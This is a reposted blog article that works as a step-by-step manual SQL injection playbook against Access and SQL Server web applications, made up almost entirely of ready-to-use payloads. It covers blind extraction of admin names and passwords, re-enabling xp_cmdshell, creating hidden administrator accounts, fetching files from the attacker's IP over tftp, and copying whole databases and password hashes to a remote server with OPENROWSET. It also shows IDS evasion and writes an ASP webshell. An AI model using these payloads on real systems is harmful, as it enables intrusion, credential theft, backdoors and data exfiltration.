The correct manual intrusion method

Source: Internet
Author: User
Tags: access, properties, sql server, injection


1. Determine whether there is an injection point

'    and 1=1    and 1=2

A lone single quote should produce a database error; "and 1=1" should return the normal page and "and 1=2" a different or empty page. Everything below assumes such a true/false page oracle.

2. Guess the table name. Common names: admin, adminuser, user, pass, password, etc.

and 0<>(select count(*) from <table name>)        template

and 0<>(select count(*) from admin)               does the admin table exist?

3. Guess the number of accounts. If "and 0<(...)" returns the normal page and "and 1<(...)" returns the error page, the table holds exactly one account.

and 0<(select count(*) from admin)

and 1<(select count(*) from admin)

4. Guess the field names. Put the candidate field name inside len().

and 1=(select count(*) from admin where len(<field name>)>0)--      template

and 1=(select count(*) from admin where len(name)>0)               user-name field, here assumed to be called name

and 1=(select count(*) from admin where len(password)>0)           password field, here assumed to be called password

5. Guess the length of each field. Raise the number after > until the page flips from normal to error, then confirm with =. The "1=(select count(*) ...)" form assumes the table holds exactly one row; with more rows, add a where clause that selects the account you want.

and 1=(select count(*) from admin where len(name)>6)          error

and 1=(select count(*) from admin where len(name)>5)          normal, so the length is 6

and 1=(select count(*) from admin where len(name)=6)          normal, confirmed

and 1=(select count(*) from admin where len(password)>11)     normal

and 1=(select count(*) from admin where len(password)>12)     error, so the length is 12

and 1=(select count(*) from admin where len(password)=12)     normal, confirmed

6. Guess the characters

and 1=(select count(*) from admin where left(name,1)='a')       first character of the user name

and 1=(select count(*) from admin where left(name,2)='ab')      first two characters of the user name

Add one character per request. Once you have guessed as many characters as the length found in step 5, the whole account name is known.

and 1=(select top 1 count(*) from admin where ascii(substring(pass,5,1))=51)--

This form tests one character position by its character code (51 is the digit 3) and can be used to guess the user name and the password. On Access the equivalent is asc(mid(pass,5,1)); on SQL Server use ascii(substring(...)), or unicode(substring(...)) when the value contains non-ASCII (for example Chinese) characters. Change the number until the page returns normally, then convert the codes back into characters. Comparing with > instead of = and bisecting the range needs about 7 requests per ASCII character instead of up to 95.

group by users.id having 1=1--

group by users.id, users.username, users.password, users.privs having 1=1--

A HAVING clause whose GROUP BY does not list every selected column makes SQL Server name the first missing column in its error message; add each disclosed column to the GROUP BY list and repeat until no error is raised to learn every column of the query.

;insert into users values(666,'attacker','foobar',0xffff)--

union select top 1 column_name from information_schema.columns where table_name='logintable'--

union select top 1 column_name from information_schema.columns where table_name='logintable' and column_name not in ('login_id')--

union select top 1 column_name from information_schema.columns where table_name='logintable' and column_name not in ('login_id','login_name')--

union select top 1 login_name from logintable--

union select top 1 password from logintable where login_name='rahul'--

When the page's own query selects an integer column, the attempt to convert the unioned string to a number fails and the error message prints the value.

Find the server version and patch level (the conversion error prints @@version, which shows e.g. whether SP4 is installed)

and 1=(select @@version)--

Check the permissions of the login the application connects with. A normal page means the login is a member of the sysadmin server role.

and 1=(select is_srvrolemember('sysadmin'))--

Determine which login the application connects with (a normal page on the first test means it is sa).

and 'sa'=(select system_user)--

and user_name()='dbo'--

and 0<>(select user_name())--

Check whether xp_cmdshell has been dropped

and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')--

If xp_cmdshell was dropped, re-register it; an absolute path to the DLL also works

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--

Ping your own host to confirm command execution

;use master;declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',null,'cmd.exe /c ping 192.168.0.1';--

Add a Windows account

;declare @shell int;exec sp_oacreate 'wscript.shell',@shell output;exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--

Create a virtual directory for drive E:

;declare @o int;exec sp_oacreate 'wscript.shell',@o out;exec sp_oamethod @o,'run',null,'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "E","E:\"'--

Set the access properties (then write a webshell into it):

;declare @o int;exec sp_oacreate 'wscript.shell',@o out;exec sp_oamethod @o,'run',null,'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/root/e +browse'--

Tip for revealing the database path (Access): submit \ in place of / in the request path, or submit %5c, so that path resolution fails and the error message discloses the database file path.

and 0<>(select top 1 paths from newtable)--

Get the database names (dbid 1 to 4 are the system databases master, tempdb, model and msdb; on SQL Server 2000 the pubs and Northwind samples usually occupy 5 and 6, so user databases start around 6 or 7)

and 1=(select name from master.dbo.sysdatabases where dbid=7)--

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

Submit dbid=7,8,9,... to get more database names. The name>1 comparison forces a conversion of the name to a number, and the resulting error message prints the name.

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')                       reveals a user table, assumed to be admin

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('admin'))      gets the other tables, one per excluded name

and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))     comparing uid with str(id) forces a conversion error that prints the object id, assumed to be 18779569

and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)                     gets one column of admin, assumed to be user_id

and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id',...))     gets the other columns

and 0<(select user_id from bbs.dbo.admin where username>1)                              the conversion error prints a user name

Repeat the same way for the password column. The example assumes columns named user_id, username, password, and so on.

The same sequence again, compactly:

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')                 get a table name

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('address'))

and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))     determine the object id

and 0<>(select top 1 name from bbs.dbo.syscolumns where id=773577794)             all columns, one per request

?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin      (union query, Access)

The union must produce as many columns as the original query; the position of * decides which of the page's output slots show the admin columns.

Get the web path

;create table [dbo].[swap]([swappass] [char](255));--

and (select top 1 swappass from swap)=1--

;create table newtable(id int identity(1,1),paths varchar(500));declare @test varchar(500);exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',@key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\',@value_name='/',values=@test output;insert into newtable(paths) values(@test)--

xp_regread reads the IIS root mapping out of the registry; the value lands in newtable and is read back with the "select top 1 paths from newtable" probe above (the conversion error prints it).

;use ku1;--

;create table cmd(str image);--      create a table cmd with an image column

Test sequence for xp_cmdshell:

;exec master..xp_cmdshell 'dir'

;exec master.dbo.sp_addlogin jiaoniang$;--      add a SQL login

;exec master.dbo.sp_password null,'1866574','jiaoniang$';--      sp_password takes old password, new password, login name in that order

;exec master.dbo.sp_addsrvrolemember 'jiaoniang$','sysadmin';--

;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--

exec master..xp_servicecontrol 'start','schedule'      start the Task Scheduler service

exec master..xp_servicecontrol 'start','server'

;declare @shell int;exec sp_oacreate 'wscript.shell',@shell output;exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'

;declare @shell int;exec sp_oacreate 'wscript.shell',@shell output;exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'

;exec master..xp_cmdshell 'tftp -i <your ip> get file.exe'--      upload a file with TFTP


;declare @a sysname;set @a=db_name();backup database @a to disk='\\<your ip>\<your share>\bak.dat'      back the database up to your own share

If the application's login is restricted, reconnect to the local server through OPENROWSET as sa (here with a blank password) and run the privileged statement inside the pass-through query:

select * from openrowset('sqloledb','<server>';'sa';'','select ''ok!'';exec master.dbo.sp_addlogin hax')

Query constructs:

select * from news where id=... and topic=... and ...

admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,1),1)='1') and userpass<>'

select 123;--

;use master;--

' or name like 'fff%';--      shows the user named ffff

and 1<>(select count(email) from [user]);--

;update [users] set email=(select top 1 name from sysobjects where xtype='U' and status>0) where name='ffff';--

;update [users] set email=(select top 1 id from sysobjects where xtype='U' and name='ad') where name='ffff';--

;update [users] set email=(select top 1 name from sysobjects where xtype='U' and id>581577110) where name='ffff';--

;update [users] set email=(select top 1 count(id) from password) where name='ffff';--

;update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--

;update [users] set email=(select top 1 name from password where id=2) where name='ffff';--

These statements take the first user table in the database and write its name into the email field of user ffff (status>0 skips system objects).

Viewing ffff's profile page then shows the first table, called ad.

With ad's object id, the next table name is obtained the same way (id greater than the previous one), and so on through the tables and then the rows of the password table.

insert into users values(666,char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),0xffff)--

insert into users values(667,123,123,0xffff)--

insert into users values(123,'admin--','password',0xffff)--

The char() concatenation spells the string chris without a quote character, which helps when quotes are filtered.

;and user>0      on SQL Server, comparing the niladic function user with a number forces a conversion error that prints the database user name

;and (select count(*) from sysobjects)>0      normal page: SQL Server

;and (select count(*) from msysobjects)>0      for an Access database (MSysObjects is Access's system table)

Getting the table names

;update aaa set aaa=(select top 1 name from sysobjects where xtype='U' and status>0);--

This writes the first table name into the aaa column of a table aaa the attacker can read.

After reading the first table, the second is read the same way by adding "and name<>" followed by the name just obtained to the condition.

;update aaa set aaa=(select top 1 name from sysobjects where xtype='U' and status>0 and name<>'vote');--

then id=1552 and exists(select * from aaa where aaa>5)

reads out the second table (comparing the varchar aaa with 5 forces a conversion error whose message prints the value). Repeat until nothing is returned.

Reading the field names works like this:

;update aaa set aaa=(select top 1 col_name(object_id('<table name>'),1));--

then id=152 and exists(select * from aaa where aaa>5)      the conversion error prints the field name

;update aaa set aaa=(select top 1 col_name(object_id('<table name>'),2));--

then id=152 and exists(select * from aaa where aaa>5)      the conversion error prints the next field name

[Get table names] [write the table name into a field, then read that field's value back]

update <table> set <field>=(select top 1 name from sysobjects where xtype='U' and status>0 [and name<>'<name already obtained>', one more for each table found]) [where condition]

select top 1 name from sysobjects where xtype='U' and status>0 and name not in ('table1','table2',...)

Creating a database administrator account and a system administrator account through a SQL Server injection vulnerability [the current login must be a member of sysadmin]

[Get field names] [write the field name into a field, then read that field's value back]

update <table> set <field>=(select top 1 col_name(object_id('<table to query>'),<column ordinal: 1, 2, ...>)) [where condition]

Bypassing IDS detection [using variables]

;declare @a sysname;set @a='xp_'+'cmdshell';exec @a 'dir c:\'

;declare @a sysname;set @a='xp'+'_cm'+'dshell';exec @a 'dir c:\'

The procedure name is assembled at run time, so the literal string xp_cmdshell never appears in the request.

1. Open a remote database

Basic syntax

select * from openrowset('sqloledb','server=<servername>;uid=sa;pwd=123','select * from table1')

Parameters: (1) OLE DB provider name, (2) connection string, (3) the query to run on the remote server

2. The connection string can name any port, for example

select * from openrowset('sqloledb','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table')

3. Copy the whole database of the target host by inserting every one of its tables into a table on the remote server.

Basic syntax:

insert into openrowset('sqloledb','server=<servername>;uid=sa;pwd=123','select * from table1') select * from table2

This line copies all data from table2 on the target (injected) host into table1 on the remote database, which in practice is the attacker's own server. Adjust the IP address and port in the connection string so that it points where you want, for example:

insert into openrowset('sqloledb','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from table2

insert into openrowset('sqloledb','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysdatabases') select * from master.dbo.sysdatabases

insert into openrowset('sqloledb','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysobjects') select * from user_database.dbo.sysobjects

insert into openrowset('sqloledb','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _syscolumns') select * from user_database.dbo.syscolumns

The receiving tables (_sysdatabases, _sysobjects, _syscolumns) must exist on the remote server beforehand with the same columns as the system tables being copied.

Copy the database:

insert into openrowset('sqloledb','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from database.dbo.table1

insert into openrowset('sqloledb','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table2') select * from database.dbo.table2

The hashes of the login passwords are stored in master.dbo.sysxlogins (SQL Server 2000). They are copied the same way:

insert into openrowset('sqloledb','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysxlogins') select * from master.dbo.sysxlogins

Once the hashes are obtained they can be cracked by brute force.

How to traverse a directory: first create a temporary table temp whose column count matches the procedure's result set

create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

insert temp exec master.dbo.xp_availablemedia;--      list all drives (four columns)

insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--      list the subdirectories (one column)

insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--      directory tree of all subdirectories into the temp table (two columns)

insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--      view the contents of a file

insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--

insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\*.asp /s /a';--

insert into temp(id) exec master.dbo.xp_cmdshell 'cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc'

insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--      (xp_dirtree is executable by the public role)

Check which fixed server roles the login holds (a normal page means membership):

Statement 1: and 1=(select is_srvrolemember('sysadmin'));--

Statement 2: and 1=(select is_srvrolemember('serveradmin'));--

Statement 3: and 1=(select is_srvrolemember('setupadmin'));--

Statement 4: and 1=(select is_srvrolemember('securityadmin'));--

Statement 5: and 1=(select is_srvrolemember('processadmin'));--

Statement 6: and 1=(select is_srvrolemember('diskadmin'));--

Statement 7: and 1=(select is_srvrolemember('bulkadmin'));--

Statement 8: and 1=(select is_srvrolemember('dbcreator'));--

Statement 9: and 1=(select is_member('db_owner'));--

The original list repeated securityadmin and bulkadmin; statements 5 and 8 here use the two remaining fixed server roles, processadmin and dbcreator.

Write the directory listing into a table:

;create table dirs(paths varchar(255),id int)--

;insert dirs exec master.dbo.xp_dirtree 'c:\'--

and 0<>(select top 1 paths from dirs)--

and 0<>(select top 1 paths from dirs where paths not in ('inetpub'))--

;create table dirs1(paths varchar(255),id int)--

;insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--

and 0<>(select top 1 paths from dirs1)--

Back up the database into the web directory, then download it:

;declare @a sysname;set @a=db_name();backup database @a to disk='e:\web\down.bak';--

and 1=(select top 1 name from (select top <n> id,name from sysobjects where xtype=char(85)) t order by id desc)      char(85) is 'U'; raise n to walk through the tables one by one

and 1=(select top 1 col_name(object_id('user_login'),1) from sysobjects)      look at the columns of the related table

and 1=(select user_id from user_login)

and 0=(select user from user_login where user>1)

-=- Wscript.Shell example -=-

declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',null,'notepad.exe'

;declare @o int;exec sp_oacreate 'wscript.shell',@o out;exec sp_oamethod @o,'run',null,'notepad.exe'--

Reading a file with Scripting.FileSystemObject:

declare @o int,@f int,@t int,@ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'opentextfile',@f out,'c:\boot.ini',1
exec @ret=sp_oamethod @f,'readline',@line out
while (@ret=0)
begin
    print @line
    exec @ret=sp_oamethod @f,'readline',@line out
end

Writing a webshell with Scripting.FileSystemObject:

declare @o int,@f int,@t int,@ret int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'createtextfile',@f out,'c:\inetpub\wwwroot\foo.asp',1
exec @ret=sp_oamethod @f,'writeline',null,'<% set o=server.createobject("wscript.shell"): o.run(request.querystring("cmd")) %>'

Speech.VoiceText example (makes the server speak):

declare @o int,@ret int
exec sp_oacreate 'speech.voicetext',@o out
exec sp_oamethod @o,'register',null,'foo','bar'
exec sp_oasetproperty @o,'speed',150
exec sp_oamethod @o,'speak',null,'all your sequel servers are belong to us',528
waitfor delay '00:00:05'

;declare @o int,@ret int;exec sp_oacreate 'speech.voicetext',@o out;exec sp_oamethod @o,'register',null,'foo','bar';exec sp_oasetproperty @o,'speed',150;exec sp_oamethod @o,'speak',null,'all your sequel servers are belong to us',528;waitfor delay '00:00:05'--

xp_dirtree is executable by the public role

exec master.dbo.xp_dirtree 'c:\'

The returned result set has two columns, subdirectory and depth: subdirectory is a character column and depth is an integer.

create table dirs(paths varchar(255),id int)

The table must correspond to the xp_dirtree result set: the same number of columns, with compatible types.

insert dirs exec master.dbo.xp_dirtree 'c:\'

As long as the table we create matches the columns the stored procedure returns, the insert executes. This is the "write to a table" technique: the procedure's output lands in a table, from which it is read back row by row with the blind probes above until we have the information we want.


This article is from the blog "My World, I am the director"; please keep this provenance: http://biock.blog.51cto.com/4643304/1643920
